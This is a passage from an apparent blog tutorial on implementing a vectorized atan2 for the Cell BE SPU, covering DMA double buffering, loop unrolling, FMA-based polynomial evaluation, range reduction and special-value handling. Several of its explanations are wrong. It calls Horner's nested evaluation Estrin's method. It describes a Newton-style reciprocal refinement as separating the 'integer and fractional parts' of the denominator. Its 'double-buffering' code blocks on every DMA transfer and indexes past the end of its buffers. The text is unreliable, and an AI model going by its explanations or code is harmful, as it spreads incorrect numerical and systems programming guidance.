<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p2 = { <span class="hljs-number">0xbf62365c</span>, <span class="hljs-number">0xbf62365c</span>, <span class="hljs-number">0xbf62365c</span>, <span class="hljs-number">0xbf62365c</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p1 = { <span class="hljs-number">0x3f490965</span>, <span class="hljs-number">0x3f490965</span>, <span class="hljs-number">0x3f490965</span>, <span class="hljs-number">0x3f490965</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p0 = { <span class="hljs-number">0xbf2697e0</span>, <span class="hljs-number">0xbf2697e0</span>, <span class="hljs-number">0xbf2697e0</span>, <span class="hljs-number">0xbf2697e0</span> };

<span class="hljs-comment">// Higher-degree polynomial coefficients for cp_fatan approximation</span>
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q7 = { <span class="hljs-number">0x3c0897d0</span>, <span class="hljs-number">0x3c0897d0</span>, <span class="hljs-number">0x3c0897d0</span>, <span class="hljs-number">0x3c0897d0</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q6 = { <span class="hljs-number">0xbd890e31</span>, <span class="hljs-number">0xbd890e31</span>, <span class="hljs-number">0xbd890e31</span>, <span class="hljs-number">0xbd890e31</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q5 = { <span class="hljs-number">0x3f6c4616</span>, <span class="hljs-number">0x3f6c4616</span>, <span class="hljs-number">0x3f6c4616</span>, <span class="hljs-number">0x3f6c4616</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q4 = { <span class="hljs-number">0xbf2bbfc2</span>, <span class="hljs-number">0xbf2bbfc2</span>, <span class="hljs-number">0xbf2bbfc2</span>, <span class="hljs-number">0xbf2bbfc2</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q3 = { <span class="hljs-number">0x3eb6679b</span>, <span class="hljs-number">0x3eb6679b</span>, <span class="hljs-number">0x3eb6679b</span>, <span class="hljs-number">0x3eb6679b</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q2 = { <span class="hljs-number">0xbf56c0c9</span>, <span class="hljs-number">0xbf56c0c9</span>, <span class="hljs-number">0xbf56c0c9</span>, <span class="hljs-number">0xbf56c0c9</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q1 = { <span class="hljs-number">0x3f7df927</span>, <span class="hljs-number">0x3f7df927</span>, <span class="hljs-number">0x3f7df927</span>, <span class="hljs-number">0x3f7df927</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q0 = { <span class="hljs-number">0xbf800000</span>, <span class="hljs-number">0xbf800000</span>, <span class="hljs-number">0xbf800000</span>, <span class="hljs-number">0xbf800000</span> };
</code></pre>
<p>In <a target="_blank" href="https://jucetize.weebly.com/uploads/3/7/2/0/37200949/cellbe-best-programming-20091211.pdf">programming for the CELL SPE</a>, it is crucial to ensure memory alignment, as the Cell BE's DMA operations and SIMD instructions often require 16-byte alignment for optimal efficiency. Explicit data transfer management between the main memory and the LS must be handled by the programmer using DMA operations, which involves initiating transfers, waiting for completion, and synchronizing data to ensure consistency. Implementing double buffering can overlap computation with data transfer, hiding latency and improving performance. Prefetching data into the LS ahead of time reduces latency and ensures that the SPU has continuous access to the required data. Synchronization primitives such as barriers and signals are essential to maintain data consistency between the LS and the main memory, as well as between different SPEs.</p>
<h2 id="heading-going-further-to-direct-memory-access">Going Further to Direct Memory Access</h2>
<p>Double buffering for DMA (Direct Memory Access) is a technique that allows for the overlapping of data transfers and computation, thus improving the efficiency of a system, particularly in the CELL BE architecture. The CELL BE comprises a Power Processing Element (PPE) and multiple Synergistic Processing Elements (SPEs). Each SPE has its own Synergistic Processing Unit (SPU) and Local Store (LS). The LS is a high-speed scratchpad memory used by the SPU, but data must be explicitly transferred between the LS and the main memory using DMA operations.</p>
<p>In double buffering, two buffers are used alternately to transfer and process data. While one buffer is being processed by the SPU, the other buffer is being filled with new data from the main memory. This technique ensures that the SPU can continue processing without waiting for data transfers to complete, thereby hiding the latency of memory operations and increasing overall throughput.</p>
<ol>
<li><p><strong>Buffer Initialization</strong>: Two buffers, <code>buffer0</code> and <code>buffer1</code>, are allocated in the LS. Pointers <code>current_buffer</code> and <code>next_buffer</code> are used to manage these buffers.</p>
</li>
<li><p><strong>Initial DMA Transfer</strong>: The <code>dma_transfer</code> function is called to initiate the first DMA transfer, filling <code>current_buffer</code> with data from the main memory.</p>
</li>
<li><p><strong>Processing and Overlapping Transfer</strong>: While the SPU processes the data in <code>current_buffer</code>, the next DMA transfer fills <code>next_buffer</code> with the subsequent data chunk. This overlap minimizes idle time.</p>
</li>
<li><p><strong>Swapping Buffers</strong>: After processing the <code>current_buffer</code>, the results are written back to the main memory. The buffers and DMA tags are then swapped, and the process repeats.</p>
</li>
</ol>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> BUFFER_SIZE 128 <span class="hljs-comment">// Example buffer size</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> TAG 1 <span class="hljs-comment">// DMA tag</span></span>

<span class="hljs-comment">// DMA transfer function</span>
<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">dma_transfer</span><span class="hljs-params">(qword *buffer, <span class="hljs-keyword">uint32_t</span> ea, <span class="hljs-keyword">int</span> tag)</span> </span>{
    mfc_get(buffer, ea, BUFFER_SIZE * <span class="hljs-keyword">sizeof</span>(qword), tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
    mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; tag);
    mfc_read_tag_status_all();
}

<span class="hljs-comment">// Double buffering for DMA transfers</span>
<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">process_with_double_buffering</span><span class="hljs-params">(<span class="hljs-keyword">uint32_t</span> ea_data, <span class="hljs-keyword">uint32_t</span> ea_result, <span class="hljs-keyword">int</span> num_elements)</span> </span>{
    qword buffer0[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword buffer1[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword *current_buffer = buffer0;
    qword *next_buffer = buffer1;
    <span class="hljs-keyword">int</span> current_tag = TAG;
    <span class="hljs-keyword">int</span> next_tag = TAG + <span class="hljs-number">1</span>;

    <span class="hljs-comment">// Initial DMA transfer</span>
    dma_transfer(current_buffer, ea_data, current_tag);

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; num_elements; i += BUFFER_SIZE) {
        <span class="hljs-comment">// Start next DMA transfer</span>
        <span class="hljs-keyword">if</span> (i + BUFFER_SIZE &lt; num_elements) {
            dma_transfer(next_buffer, ea_data + (i + BUFFER_SIZE) * <span class="hljs-keyword">sizeof</span>(qword), next_tag);
        }

        <span class="hljs-comment">// Process current buffer</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; BUFFER_SIZE &amp;&amp; (i + j) &lt; num_elements; ++j) {
            qword y = current_buffer[j * <span class="hljs-number">2</span>];
            qword x = current_buffer[j * <span class="hljs-number">2</span> + <span class="hljs-number">1</span>];
            qword result = _cp_fatan2(y, x);
            current_buffer[j] = result;
        }

        <span class="hljs-comment">// Write results back</span>
        mfc_put(current_buffer, ea_result + i * <span class="hljs-keyword">sizeof</span>(qword), BUFFER_SIZE * <span class="hljs-keyword">sizeof</span>(qword), current_tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; current_tag);
        mfc_read_tag_status_all();

        <span class="hljs-comment">// Swap buffers and tags</span>
        qword *temp_buffer = current_buffer;
        current_buffer = next_buffer;
        next_buffer = temp_buffer;
        <span class="hljs-keyword">int</span> temp_tag = current_tag;
        current_tag = next_tag;
        next_tag = temp_tag;
    }
}
</code></pre>
<p>The buffers are aligned using <code>__attribute__((aligned(16)))</code> to ensure proper alignment for SIMD (Single Instruction, Multiple Data) operations. Proper alignment is crucial for SIMD operations because it allows data to be loaded and stored in chunks, minimizing the number of memory accesses and maximizing the throughput of data processing. Misaligned data can cause additional overhead and reduce the efficiency of SIMD instructions.</p>
<p>Then, the <code>dma_transfer</code> function starts the first DMA transfer, loading data from the main memory into <code>current_buffer</code>. The function uses <code>mfc_get</code> to initiate the transfer and <code>mfc_write_tag_mask</code> and <code>mfc_read_tag_status_all</code> to manage DMA tags and ensure the transfer completes before processing.</p>
<p>Inside the loop, while the SPU processes the data in <code>current_buffer</code>, the next DMA transfer is initiated to load data into <code>next_buffer</code>. This is achieved by checking if there are more elements to process (<code>i + BUFFER_SIZE &lt; num_elements</code>) and calling <code>dma_transfer</code> for <code>next_buffer</code>.</p>
<p>After processing <code>current_buffer</code>, the results are written back to the main memory using <code>mfc_put</code>. The buffers and tags are then swapped, allowing the next iteration of the loop to process the newly loaded data while the previous results are being transferred back.</p>
<h2 id="heading-loop-unrolling-through-parallelism">Loop Unrolling through Parallelism</h2>
<p>Loop unrolling is an optimization technique used to enhance the performance of loops by decreasing the loop control overhead and increasing the instruction-level parallelism. This technique involves replicating the loop body multiple times within a single iteration, thereby reducing the number of iterations and allowing more operations to be executed in parallel.</p>
<p>Consider a loop that processes one element per iteration:</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; n; ++i) {
    process(data[i]);
}
</code></pre>
<p>If we unroll this loop by a factor of 4, the loop body is replicated four times, and the loop control instructions are adjusted accordingly:</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; n; i += <span class="hljs-number">4</span>) {
    process(data[i]);
    process(data[i + <span class="hljs-number">1</span>]);
    process(data[i + <span class="hljs-number">2</span>]);
    process(data[i + <span class="hljs-number">3</span>]);
}
</code></pre>
<p>By doing this, the number of iterations is reduced by a factor of 4, thus reducing the loop control overhead (incrementing the counter and checking the loop condition) and exposing more opportunities for parallel execution.</p>
<p>Loop unrolling enhances the efficiency of the double buffering technique by minimizing the overhead of loop control operations and increasing the degree of parallelism. This is particularly beneficial in the CELL BE architecture, where the SPU can take advantage of SIMD instructions to process multiple data points concurrently.</p>
<p>Here’s how loop unrolling can be applied in the code :</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> BUFFER_SIZE 128</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> TAG 1</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> UNROLL_FACTOR 4</span>

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">doublebuff</span><span class="hljs-params">(<span class="hljs-keyword">uint32_t</span> ea_data, <span class="hljs-keyword">uint32_t</span> ea_result, <span class="hljs-keyword">int</span> num_elements)</span> </span>{
    qword buffer0[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword buffer1[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword *current_buffer = buffer0;
    qword *next_buffer = buffer1;
    <span class="hljs-keyword">int</span> current_tag = TAG;
    <span class="hljs-keyword">int</span> next_tag = TAG + <span class="hljs-number">1</span>;

    <span class="hljs-comment">// Initial DMA transfer</span>
    dma_transfer(current_buffer, ea_data, current_tag);

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; num_elements; i += BUFFER_SIZE) {
        <span class="hljs-keyword">if</span> (i + BUFFER_SIZE &lt; num_elements) {
            dma_transfer(next_buffer, ea_data + (i + BUFFER_SIZE) * <span class="hljs-keyword">sizeof</span>(qword), next_tag);
        }

        <span class="hljs-comment">// Process current buffer with loop unrolling</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; BUFFER_SIZE; j += UNROLL_FACTOR) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> k = <span class="hljs-number">0</span>; k &lt; UNROLL_FACTOR &amp;&amp; (i + j + k) &lt; num_elements; ++k) {
                qword y = current_buffer[(j + k) * <span class="hljs-number">2</span>];
                qword x = current_buffer[(j + k) * <span class="hljs-number">2</span> + <span class="hljs-number">1</span>];
                qword result = _cp_fatan2(y, x);
                current_buffer[j + k] = result;
            }
        }

        mfc_put(current_buffer, ea_result + i * <span class="hljs-keyword">sizeof</span>(qword), BUFFER_SIZE * <span class="hljs-keyword">sizeof</span>(qword), current_tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; current_tag);
        mfc_read_tag_status_all();

        qword *temp_buffer = current_buffer;
        current_buffer = next_buffer;
        next_buffer = temp_buffer;
        <span class="hljs-keyword">int</span> temp_tag = current_tag;
        current_tag = next_tag;
        next_tag = temp_tag;
    }
}
</code></pre>
<p>The buffers are initialized in the LS, ensuring they are aligned to 16-byte boundaries for efficient SIMD operations. The first DMA transfer is initiated to fill <code>current_buffer</code> with data from the main memory. And then, inside the loop the body of the loop is unrolled by a factor of 4. This reduces the number of iterations and allows multiple elements to be processed in each iteration, reducing loop overhead and improving parallelism. After processing <code>current_buffer</code>, the results are written back to the main memory, and the buffers are swapped for the next iteration.</p>
<h2 id="heading-polynomial-approximation-through-fused-multiply-add-fma-operations">Polynomial Approximation Through Fused Multiply-Add (FMA) Operations</h2>
<p>Now we can start getting into the mathematics of it all. And it starts by computing the arctangent of a single-precision floating-point value or a vector of four single-precision floating-point values using a polynomial approximation. We can implement this using the Estrin's method, evaluating the numerator and denominator polynomials separately using Fused Multiply-Add (FMA) instructions, and then dividing the numerator by the denominator to obtain the final result.</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword xp2 = si_fm(range_x, range_x);
<span class="hljs-keyword">const</span> qword znum0 = f_atan_p0;
<span class="hljs-keyword">const</span> qword znum1 = si_fma(znum0, xp2, f_atan_p1); <span class="hljs-comment">// FMA: (znum0 * xp2) + f_atan_p1</span>
<span class="hljs-keyword">const</span> qword znum2 = si_fma(znum1, xp2, f_atan_p2); <span class="hljs-comment">// FMA: (znum1 * xp2) + f_atan_p2</span>
<span class="hljs-keyword">const</span> qword znum3 = si_fma(znum2, xp2, f_atan_p3); <span class="hljs-comment">// FMA: (znum2 * xp2) + f_atan_p3</span>
<span class="hljs-keyword">const</span> qword znum = si_fma(znum3, xp2, f_atan_p4); <span class="hljs-comment">// FMA: (znum3 * xp2) + f_atan_p4</span>
<span class="hljs-keyword">const</span> qword zden0 = si_fa(xp2, f_atan_q0);
<span class="hljs-keyword">const</span> qword zden1 = si_fma(zden0, xp2, f_atan_q1); <span class="hljs-comment">// FMA: (zden0 * xp2) + f_atan_q1</span>
<span class="hljs-keyword">const</span> qword zden2 = si_fma(zden1, xp2, f_atan_q2); <span class="hljs-comment">// FMA: (zden1 * xp2) + f_atan_q2</span>
<span class="hljs-keyword">const</span> qword zden3 = si_fma(zden2, xp2, f_atan_q3); <span class="hljs-comment">// FMA: (zden2 * xp2) + f_atan_q3</span>
<span class="hljs-keyword">const</span> qword zden = si_fma(zden3, xp2, f_atan_q4); <span class="hljs-comment">// FMA: (zden3 * xp2) + f_atan_q4</span>
</code></pre>
<p>A polynomial of degree n can be written as</p>
<pre><code class="lang-plaintext">P(x) = a₀ + a₁x + a₂x² + ... + aₙxⁿ
     = a₀ + x(a₁ + x(a₂ + ... + x(aₙ₋₁ + xaₙ)))
</code></pre>
<p>This representation allows the polynomial to be evaluated using nested multiplication and addition operations, with each level of nesting corresponding to a higher power of x. In the <code>_cp_fatan</code> implementation, the numerator polynomial is evaluated as:</p>
<p>$$znum = f_atan_p0 + xp2 * (f_atan_p1 + xp2 * (f_atan_p2 + xp2 * (f_atan_p3 + xp2 * f_atan_p4)))$$</p><p>Similarly, the denominator polynomial is evaluated as:</p>
<p>$$zden = f_atan_q0 + xp2 * (f_atan_q1 + xp2 * (f_atan_q2 + xp2 * (f_atan_q3 + xp2 * f_atan_q4)))$$</p><p>The Estrin method is particularly well-suited for architectures that support Fused Multiply-Add (FMA) instructions, as each level of nesting can be computed using a single FMA operation. This is precisely what the implementation does, using the <code>si_fma</code> intrinsic to perform the nested multiplication and addition operations in a single instruction.</p>
<p>The main advantage of the Estrin method is that it minimizes the number of operations required to evaluate a polynomial. For a polynomial of degree n, the Estrin method requires only n multiplications and n additions, which is optimal in terms of the number of operations.</p>
<p>However, it's important to note that the Estrin method can introduce numerical instabilities due to the accumulation of rounding errors, especially for higher-degree polynomials or input values with large magnitudes. To mitigate this issue, we need to refine the denominator value by performing a series of FMA operations. The first step is to compute <code>(1 - zden_r0) * zden</code> using the <code>si_fnms</code> (Fused Negative Multiply-Subtract) intrinsic:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword zden_r1 = si_fnms(zden_r0, zden, f_one);
</code></pre>
<p>This operation computes <code>(1 - zden_r0) * zden</code> and subtracts the result from <code>1.0</code>. The purpose of this step is to remove the fractional part from <code>zden</code>, effectively computing the integer part of <code>zden</code>.</p>
<p>Finally, the implementation refines the denominator value by adding the fractional part back to the integer part using another FMA operation:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword zden_r = si_fma(zden_r1, zden_r0, zden_r0);
</code></pre>
<p>This operation computes <code>zden_r1 * zden_r0 + zden_r0</code>, which is equivalent to adding the fractional part (<code>zden_r0</code>) to the integer part (<code>zden_r1 * zden_r0</code>). The result is a more accurate representation of the denominator value, denoted as <code>zden_r</code>.</p>
<p>With the refined denominator value <code>zden_r</code>, the implementation can now perform the final division more accurately:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword zdiv = si_fm(znum, zden_r);
</code></pre>
<p>This step computes <code>zdiv = znum / zden_r</code>, which is the final result of the arctangent approximation.</p>
<p>The purpose of refining the denominator value is to reduce the impact of rounding errors when the denominator is close to zero. By separating the integer and fractional parts of the denominator and refining the fractional part, the implementation can maintain higher precision and reduce the accumulation of rounding errors, especially in cases where the denominator value is small.</p>
<p>Mathematically, the refinement process can be represented as follows:</p>
<p>Let <code>zden = f + i</code>, where <code>f</code> is the fractional part, and i is the integer part.</p>
<p>Then :</p>
<p>$$zden_r0 = f$$</p><p>$$zden_r1 = (1 - f) \cdot (f + i) = i + f - f^2 \approx i$$</p><p>$$zden_r = zden_r1 + zden_r0 = i + f = zden$$</p><p>By refining the denominator value (<code>zden_r</code>) to be a more accurate representation of <code>zden</code>, the implementation can mitigate the potential numerical instabilities caused by rounding errors, especially when the denominator value is close to zero.</p>
<h2 id="heading-refining-values-through-range-reduction">Refining Values Through Range Reduction</h2>
<p>Range reduction is crucial for improving the accuracy and efficiency of the arctangent approximation. It involves mapping the input value <code>x</code> into a smaller range, where the arctangent function can be more accurately approximated using a polynomial.</p>
<p>The CELL BE, like most modern processors, represents single-precision (32-bit) and double-precision (64-bit) floating-point numbers using a fixed number of bits for the significand (mantissa) and exponent. This limited precision can lead to rounding errors when representing certain values or performing arithmetic operations. For example, when computing the arctangent function using a polynomial approximation, the input values may need to be divided or multiplied by certain constants. If these constants cannot be represented exactly in the floating-point format, rounding errors can accumulate throughout the computation, potentially leading to inaccurate results.</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range0_mask = si_fcgt(pos_x, f_t3p8);
<span class="hljs-keyword">const</span> qword range1_gt_mask = si_fcgt(f_pt66, pos_x);
<span class="hljs-keyword">const</span> qword range1_eq_mask = si_fceq(f_pt66, pos_x);
<span class="hljs-keyword">const</span> qword range1_mask = si_or(range1_gt_mask, range1_eq_mask);
<span class="hljs-keyword">const</span> qword range2_mask = si_nor(range0_mask, range1_mask);
</code></pre>
<p>The <code>range0_mask</code> identifies cases where <code>pos_x</code> (the absolute value of the input <code>x</code>) is greater than <code>tan(3π/8)</code>, which is a constant value <code>f_t3p8</code>. The <code>si_fcgt</code> intrinsic performs a floating-point greater-than comparison.</p>
<p>The <code>range1_mask</code> identifies cases where <code>pos_x</code> is less than or equal to <code>0.66</code>, which is a constant value <code>f_pt66</code>. It is computed by combining two masks using <code>si_or</code>: <code>range1_gt_mask</code> (for <code>pos_x &lt; 0.66</code>) and <code>range1_eq_mask</code> (for <code>pos_x == 0.66</code>).</p>
<p>The <code>range2_mask</code> identifies the remaining cases that are not covered by <code>range0_mask</code> or <code>range1_mask</code>. It is computed by performing a bitwise NOR operation (<code>si_nor</code>) on <code>range0_mask</code> and <code>range1_mask</code>.</p>
<p>These range masks are used to select different computations and approximations for the arctangent function, based on the range in which the input value falls.</p>
<p>For the <code>range0</code> case, where <code>pos_x</code> is greater than <code>tan(3π/8)</code>, the range reduction involves computing <code>-1.0 / pos_x</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range0_x0 = si_frest(pos_x);
<span class="hljs-keyword">const</span> qword range0_x1 = si_fi(pos_x, range0_x0);
<span class="hljs-keyword">const</span> qword range0_x2 = si_fnms(range0_x1, pos_x, f_one);
<span class="hljs-keyword">const</span> qword range0_x3 = si_fma(range0_x2, range0_x1, range0_x1);
<span class="hljs-keyword">const</span> qword range0_x = si_xor(range0_x3, f_msb);
<span class="hljs-keyword">const</span> qword range0_y = f_pio2;
</code></pre>
<p>This computation is performed using a series of FMA (Fused Multiply-Add) instructions for improved accuracy and performance. The final result, <code>range0_x</code>, is then negated using an XOR operation with <code>f_msb</code> (which flips the sign bit). The corresponding <code>range0_y</code> value is set to <code>π/2</code>.</p>
<p>For the <code>range1</code> case, where <code>pos_x</code> is less than or equal to <code>0.66</code>, the range reduction is straightforward:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range1_x = pos_x;
<span class="hljs-keyword">const</span> qword range1_y = f_zero;
</code></pre>
<p>The <code>range1_x</code> value is simply set to <code>pos_x</code>, and the corresponding <code>range1_y</code> value is set to <code>0.0</code>.</p>
<p>For the <code>range2</code> case, which covers the remaining values of <code>pos_x</code>, the range reduction involves computing <code>(pos_x - 1.0) / (pos_x + 1.0)</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range2_y = f_pio4;
<span class="hljs-keyword">const</span> qword range2_x0num = si_fs(pos_x, f_one);
<span class="hljs-keyword">const</span> qword range2_x0den = si_fa(pos_x, f_one);
<span class="hljs-keyword">const</span> qword range2_x0 = si_frest(range2_x0den);
<span class="hljs-keyword">const</span> qword range2_x1 = si_fnms(range2_x0, range2_x0den, f_one);
<span class="hljs-keyword">const</span> qword range2_x2 = si_fma(range2_x1, range2_x0, range2_x0);
<span class="hljs-keyword">const</span> qword range2_x = si_fm(range2_x0num, range2_x2);
</code></pre>
<p>This computation is also performed using FMA instructions for efficiency. The corresponding <code>range2_y</code> value is set to <code>π/4</code>.</p>
<p>After computing the range-specific values (<code>range0_x</code>, <code>range1_x</code>, <code>range2_x</code>, <code>range0_y</code>, <code>range1_y</code>, <code>range2_y</code>), the appropriate values are selected based on the range masks:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range_x0 = si_selb(range2_x, range0_x, range0_mask);
<span class="hljs-keyword">const</span> qword range_x = si_selb(range_x0, range1_x, range1_mask);
<span class="hljs-keyword">const</span> qword range_y0 = si_selb(range2_y, range0_y, range0_mask);
<span class="hljs-keyword">const</span> qword range_y = si_selb(range_y0, range1_y, range1_mask);
</code></pre>
<p>The <code>si_selb</code> intrinsic is used to perform a conditional selection operation, selecting the first value if the corresponding mask bit is <code>0</code>, and the second value if the mask bit is <code>1</code>. The range-specific values <code>range_x</code> and <code>range_y</code> are then used in the subsequent polynomial approximation step of the <code>_cp_fatan</code> function.</p>
<p>The purpose of this range reduction is to map the input value <code>x</code> into a smaller range, typically [-1, 1], where the arctangent function can be more accurately approximated using a polynomial. By decomposing the input range into multiple sub-ranges and applying different range reduction strategies, the implementation can achieve higher accuracy and efficiency in the approximation.</p>
<h2 id="heading-special-case-handling-for-weird-values">Special Case Handling for Weird Values</h2>
<p>We need to handle special cases to ensure correct results when dealing with corner cases or exceptional inputs, such as zero, infinity, and NaN (Not a Number) to make sure that the approximation adheres to the mathematical specifications and produces accurate results even in corner cases that might otherwise lead to undefined or incorrect behavior.</p>
<h3 id="heading-positive-and-negative-infinite-inputs">Positive and Negative Infinite Inputs</h3>
<p>When one of the inputs (x or y) is infinite, the mathematical behavior of the atan2(y, x) function needs to be explicitly defined. For example, when y is positive infinity and x is negative infinity, the result should be 3π/4 radians. These cases cannot be handled by the general polynomial approximation used for finite input values.</p>
<p>Masks <code>x_eqinf_mask</code> and <code>x_eqninf_mask</code> are created using <code>si_fceq</code> to identify if <code>x</code> is equal to positive or negative infinity, respectively.</p>
<p>If <code>x</code> is positive infinity, the result should be <code>π/2</code>. This is achieved by selecting between <code>result_y0</code> (the result from the previous step) and <code>f_pio2</code> (the constant value for <code>π/2</code>) based on the <code>x_eqinf_mask</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword result_y1 = si_selb(result_y0, f_pio2, x_eqinf_mask);
</code></pre>
<p>If <code>x</code> is negative infinity, the result should be <code>-π/2</code>. This is achieved by selecting between <code>result_y1</code> (the result from the previous step) and <code>f_npio2</code> (the constant value for <code>-π/2</code>) based on the <code>x_eqninf_mask</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword result = si_selb(result_y1, f_npio2, x_eqninf_mask);
</code></pre>
<h3 id="heading-if-input-is-zero">If Input is Zero</h3>
<p>When one or both inputs are zero, the mathematical behavior of atan2(y, x) becomes undefined or depends on the specific signs of x and y. For instance, when y is 0 and x is negative, the result should be π radians, while when y is 0 and x is positive, the result should be 0 radians. These cases require special handling to ensure correct results.</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword x_eqz_mask = si_fceq(f_zero, x);
<span class="hljs-keyword">const</span> qword result_y0 = si_selb(pos_yaddz, x, x_eqz_mask);

<span class="hljs-keyword">const</span> qword x_eqinf_mask = si_fceq(f_inf, x);
<span class="hljs-keyword">const</span> qword x_eqninf_mask = si_fceq(f_ninf, x);
<span class="hljs-keyword">const</span> qword result_y1 = si_selb(result_y0, f_pio2, x_eqinf_mask);
<span class="hljs-keyword">const</span> qword result = si_selb(result_y1, f_npio2, x_eqninf_mask);
</code></pre>
<p>The first step is to identify if the input <code>x</code> is equal to <code>0.0</code> using the <code>si_fceq</code> intrinsic, which performs a floating-point equal-to comparison. The result is stored in the <code>x_eqz_mask</code>.</p>
<p>If <code>x</code> is equal to <code>0.0</code>, the result should be <code>0.0</code>. This is achieved by selecting between <code>pos_yaddz</code> (the computed arctangent value from the previous steps) and <code>x</code> (which is <code>0.0</code>) based on the <code>x_eqz_mask</code>. The <code>si_selb</code> intrinsic is used for this conditional selection operation:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword result_y0 = si_selb(pos_yaddz, x, x_eqz_mask);
</code></pre>
<h3 id="heading-not-a-number-nan">Not a Number (NaN)</h3>
<p>If either x or y is NaN, the result of atan2(y, x) should also be NaN, according to the <a target="_blank" href="https://christophervickery.com/babbage/IEEE-754.old/References.xhtml">IEEE 754 floating-point standard</a>. NaN values represent invalid or undefined results, and they need to be propagated correctly through mathematical operations. The CELL BE itself supports various rounding modes, including round-to-nearest, round-toward-positive-infinity, round-toward-negative-infinity, and round-toward-zero. The choice of rounding mode can affect the final result, especially when dealing with exceptional values or inputs near the boundaries of the representable range. For example, when computing atan2(y, x) with x or y close to zero, the rounding mode can determine whether the result is rounded to zero or a non-zero value.</p>
<p>The CELL BE provides hardware support for handling exceptional floating-point values like infinities and NaNs (Not a Number). However, the behavior of arithmetic operations involving these values may not always be intuitive or consistent across different scenarios. For example, when computing atan2(y, x) with one input being infinity and the other being a finite value, the result can depend on the specific signs of the inputs and may require special handling to ensure accurate and consistent behavior.</p>
<h1 id="heading-thoughts-and-conclusions">Thoughts and Conclusions</h1>
<p>One key advantage of a SPE-centric approach to vectorizing mathematical functions is that it can potentially unlock higher levels of parallelism and efficiency, as the SPEs are not constrained by the need to continuously communicate with the PPE. This can be particularly beneficial for workloads that can be effectively parallelized and distributed across the multiple SPEs.</p>
